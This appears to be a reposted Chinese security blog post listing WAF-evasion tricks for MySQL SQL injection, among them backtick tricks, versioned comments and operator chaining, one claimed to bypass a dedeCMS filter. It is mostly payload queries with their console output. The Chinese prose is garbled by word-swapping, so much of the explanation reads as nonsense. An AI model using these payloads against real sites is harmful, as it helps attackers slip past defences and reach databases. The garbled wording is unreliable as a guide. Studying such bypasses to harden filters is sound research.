研讨过外洋外的waf。分享一些?奇淫绝技。
一些自己都了解的才略如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重新说起。
以下以Mysql为例告诉这些才略:
?(花腔输出表的谁人管束符)绕过空格和一些正则成婚。
Default| 12345678 | mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +----------------------+ 1 row in set (0.00 sec) |
一个更好玩的才略,这个管束符能够当注释符垄断(限定条件)。
Default| 1234567 | mysql> select id from qs_admins where id=1;`dfff and comment it; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) |
usage : where ?id =’0’`’xxxxcomment on.
(留心这里是 – + . 三个标记)
Default| 12345678910111213141516171819202122232425 | mysql> select id from qs_admins; +----+ | id |+----+ | 1 | +----+ 1 row in set (0.00 sec) mysql> select+id-1+1.from qs_admins; +----------+ | +id-1+1. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) mysql> select-id-1+3.from qs_admins; +----------+ | -id-1+3. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) (有些人不是不停在说关键字怎么过?过滤一个from ... ? ?就是如许连起来过) |
| 12345678 | mysql> select@^1.from qs_admins; +------|+ | @^1. | +------|+ | NULL | +------|+ 这个是bypass ?已经dedeCMS filter . |
| 1234567 | mysql> select-count(id)test from qs_admins; +------|+ | test | +------|+ | -1 | +------|+ 1 row in set (0.00 sec) |
| 1234567 | mysql> /\*!40000select\*/ id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) |
91ri.org小编语:waf而今作为防备入侵者的一道门槛,正在被渐渐的加强。而对绕过这类防护步骤的各类才略的研讨也有助于安全研讨者进一步了解自身不足,持续搏斗!上述这些想法思想才略赤心NB。
法宝更必要分享给自己。
关系文章保举《垄断MySQL隐形典范转换绕过WAF》《经由过程HTTP参数污染绕过WAF拦截》
link:http://drops.wooyun.org/tips/132?(对原文稍作篡改)
本文由网络安全攻防研讨室(www.91ri.org)动静安全小组收集整理,转载请阐明情由。
